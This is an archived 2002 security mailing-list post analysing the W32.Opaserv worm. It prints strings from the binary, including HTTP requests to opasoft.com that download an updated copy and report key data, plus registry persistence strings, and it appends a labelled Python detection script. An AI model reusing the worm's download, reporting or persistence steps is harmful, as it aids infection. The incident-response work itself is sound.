Security Incidents mailing list archives
RE: Unusual volume: UDP:137 probes
From: Richard.Grant () mail state ky us
Date: Tue, 1 Oct 2002 09:44:29 -0400
We had some internal machines that were contributing to the netbios flood attack. These machines were sniffed and from that we found a file on the identified machines named scrsvr.exe. The file was reverse engineered and the results are listed below. While some are attributing the netbios activity to Bugbear@mm it does not follow what we were seeing. It is known as W32.Opaserv.Worm. Comments?

Strings recovered from scrsvr.exe:

ScrSvr31415
KERNEL32.dll
RegisterServiceProcess
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Internet Settings
ScrSvr
ScrSvrOld
ProxyEnable
ProxyServer
\ScrSvr.exe
ScrSin.dat
ScrSout.dat
scrupd.exe
www.opasoft.com

GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1
Host: www.opasoft.com

GET http://www.opasoft.com/work/lastver HTTP/1.1
Host: www.opasoft.com

GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1
Host: www.opasoft.com

POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1
Host: www.opasoft.com

OK
PLAIN
CIPHER1
KEY
WINDOWS\scrsvr.exe
WINDOWS\win.ini
c:\tmp.ini
c:\windows\scrsvr.exe
windows
run
CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
LOCALHOST

Imported DLLs:
KERNEL32.dll
ADVAPI32.dll
USER32.dll
WS2_32.dll

Imported functions:
LocalAlloc, GetCurrentProcess, ExitThread, SetFilePointer, ResetEvent, ReadFile, CreateMutexA, LocalFree, GetModuleFileNameA, SetPriorityClass, SetEndOfFile, GetModuleHandleA, RegisterServiceProcess, GetPrivateProfileStringA, GetProcAddress, ExitProcess, CopyFileA, LocalReAlloc, CreateProcessA, CloseHandle, WaitForSingleObject, Sleep, CreateThread, CreateFileA, GetLastError, SetCurrentDirectoryA, DeleteFileA, GetFileSize, WriteFile, WritePrivateProfileStringA, lstrcat, lstrcmpi, lstrlen, GetWindowsDirectoryA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegDeleteValueA, RegCloseKey, PeekMessageA, DispatchMessageA, TranslateMessage, socket, send, recvfrom, recv, inet_addr, gethostname, gethostbyname, connect, closesocket, bind, WSAStartup, sendto, WSAGetLastError, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent

[The remainder of the strings output consists of non-printable binary data (PE relocation tables and code bytes) and is omitted here.]

Richard Grant [CNA, GSEC]
Security Engineer
Governor's Office for Technology
Commonwealth of Kentucky
Phone: 502-564-5792
Fax: 502.564.6856
richard.grant () mail state ky us
Web: http://www.state.ky.us/got/ois/security/security.html
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message.
-----Original Message-----
From: Emeric Miszti [mailto:emeric () uksecurityonline com]
Sent: Monday, September 30, 2002 11:55 AM
To: incidents () securityfocus com
Subject: Re: Unusual volume: UDP:137 probes

On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:

On Monday, September 30, 2002 9:02 AM, John Sage [SMTP:jsage () finchhaven com] wrote:

This has received some mention on the UNISOG list and elsewhere, but not here. Some people have been seeing unusually high volumes of UDP:137 probes since about 09/27/02 late, or early 09/28/02.

A few people (who log such things) on the Optus cable network in Australia have been seeing it too. In my case since Sep 20 it's gone ...

Sep 20: 2 hits
Sep 21, 22, 23: 0 hits
Sep 24: 3 hits
Sep 25: 0 hits
Sep 26: 4 hits
Sep 27: 2 hits
Sep 28: 156 hits, starting at 02:20 (Aust. EST)
Sep 29: 410 hits
Sep 30: 406 hits up until 18:24

Been seeing exactly the same spike with same patterns. Up from 40 odd scans on 28/9/2002 to 495 already today. Incidents.org have picked this up at the Internet Storm Center http://isc.incidents.org/port_details.html?port=137 No explanations or reasons have been given by anyone yet.

--
Emeric Miszti
UK Security Online
http://www.uksecurityonline.com
Tel No: 0870 088 5689
Fax No: 0870 706 2162
PGP Public Key available at http://www.uksecurityonline.com/emeric.asc

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
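Added example, not part of any message in this thread: a small Python script that turns the indicators in Richard Grant's scrsvr.exe strings dump into checks a responder could run during this incident, and applies a simple spike test to per-day UDP:137 counts like the ones Mark Forsyth posted. The mutex, file, registry and opasoft.com URL strings are taken from the dump; the proxy-log line format, the stage labels for the four HTTP requests, and the threshold values are assumptions made for illustration.

```python
"""Added example, not from any post in this thread: checks built from the W32.Opaserv
indicators in the scrsvr.exe strings dump, run over constructed input. The proxy-log
line format and the stage labels are assumptions; the indicator strings and the
UDP/137 day counts come from the posts above."""
import re
import statistics
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

C2_HOST = "www.opasoft.com"
# Request paths present in the binary; the labels are this example's reading of them.
C2_PATHS = {
    "/work/scheduler.php": "scheduler",    # GET ...task=newzad and POST ...plain=/cipher1=/key=
    "/work/lastver": "version-check",
    "/work/scrsvr.exe": "update-download",
}
# Host-side strings from the dump, grouped for reporting.
HOST_IOCS = {
    "mutex": ["ScrSvr31415"],
    "file": ["scrsvr.exe", "ScrSin.dat", "ScrSout.dat", "scrupd.exe", "tmp.ini"],
    "persistence": [r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "win.ini"],
}

def scan_strings(dump):
    """Return {category: [indicator, ...]} for the IOCs found in a strings-style dump."""
    low = dump.lower()
    hits = {}
    for category, needles in HOST_IOCS.items():
        matched = [n for n in needles if n.lower() in low]
        if matched:
            hits[category] = matched
    return hits

# Assumed proxy-log line format: "<client_ip> <METHOD> <url>" (constructed for this example).
LOG_RE = re.compile(r"^(\S+)\s+(GET|POST)\s+(\S+)$")

def classify_request(method, url):
    """Name the C2 stage a request belongs to, or None if it is not opasoft.com traffic."""
    parts = urlsplit(url)
    if parts.hostname != C2_HOST:
        return None
    stage = C2_PATHS.get(parts.path)
    if stage is None:
        return "unknown-path"
    if stage == "scheduler":
        query = parse_qs(parts.query)
        # The POST in the dump carries plain/cipher1/key parameters; the GET carries task=.
        if method == "POST" and {"plain", "cipher1", "key"}.issubset(query):
            return "scheduler:key-report"
        return "scheduler:task-poll"
    return stage

def scan_proxy_log(lines):
    """Return {client_ip: sorted C2 stages seen} for clients talking to the worm's host."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        client, method, url = m.groups()
        stage = classify_request(method, url)
        if stage is not None:
            seen[client].add(stage)
    return {client: sorted(stages) for client, stages in seen.items()}

def spike_days(daily_hits, factor=5, min_hits=50):
    """Flag days whose UDP/137 count exceeds both an absolute floor and factor x the
    median of earlier, unflagged days; flagged days are kept out of the baseline."""
    flagged, history = [], []
    for day, count in daily_hits:
        if history:
            baseline = max(statistics.median(history), 1)
            if count >= min_hits and count > factor * baseline:
                flagged.append(day)
                continue
        history.append(count)
    return flagged

# Constructed sample input. The strings excerpt is shortened from the dump in the post.
SAMPLE_STRINGS = ("ScrSvr31415.KERNEL32.dll.RegisterServiceProcess."
                  "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run."
                  "\\ScrSvr.exe.ScrSin.dat.ScrSout.dat.scrupd.exe.www.opasoft.com")
SAMPLE_LOG = [
    "10.1.2.3 GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0",
    "10.1.2.3 GET http://www.opasoft.com/work/lastver",
    "10.1.2.3 GET http://www.opasoft.com/work/scrsvr.exe",
    "10.1.2.3 POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF"
    "&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0",
    "10.1.9.9 GET http://www.example.org/index.html",
]
# Per-day UDP/137 hit counts as reported by Mark Forsyth in the quoted message above.
UDP137_DAILY = [("Sep 20", 2), ("Sep 21", 0), ("Sep 22", 0), ("Sep 23", 0), ("Sep 24", 3),
                ("Sep 25", 0), ("Sep 26", 4), ("Sep 27", 2), ("Sep 28", 156),
                ("Sep 29", 410), ("Sep 30", 406)]

if __name__ == "__main__":
    print(scan_strings(SAMPLE_STRINGS))
    print(scan_proxy_log(SAMPLE_LOG))
    print(spike_days(UDP137_DAILY))
```

Run as-is it reports the mutex, file and Run-key hits in the strings excerpt, shows 10.1.2.3 walking through all four opasoft.com request types, and flags Sep 28 through Sep 30 as the spike days. Keeping flagged days out of the baseline is deliberate: once the outbreak starts, a trailing median that includes the outbreak days would stop flagging the continuing activity.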
Current thread:
- RE: Unusual volume: UDP:137 probes Bamm (Robert) Visscher (Sep 30)
- <Possible follow-ups>
- Re: Unusual volume: UDP:137 probes Nick FitzGerald (Sep 30)
- RE: Unusual volume: UDP:137 probes Mark Forsyth (Sep 30)
- RE: Unusual volume: UDP:137 probes Joseph R. Gruber (Sep 30)
- Re: Unusual volume: UDP:137 probes Hugo van der Kooij (Sep 30)
- SV: Unusual volume: UDP:137 probes Peter Kruse (Oct 01)
- Re: Unusual volume: UDP:137 probes Christopher Albert (Sep 30)
- RE: Unusual volume: UDP:137 probes Richard . Grant (Oct 01)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- Re: Unusual volume: UDP:137 probes Alain Fauconnet (Oct 04)
- Re: Unusual volume: UDP:137 probes Matt Power (Oct 05)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- RE: Unusual volume: UDP:137 probes Scott, Michael R. (Oct 01)
- Re: Unusual volume: UDP:137 probes Axel Pettinger (Oct 01)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
- maybe a simple problem Andrew Fison (Oct 02)
- Re: maybe a simple problem Igor D. Spivak (Oct 02)
- RE: maybe a simple problem Greg Reber (Oct 03)
- Re: maybe a simple problem Brad Arlt (Oct 03)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)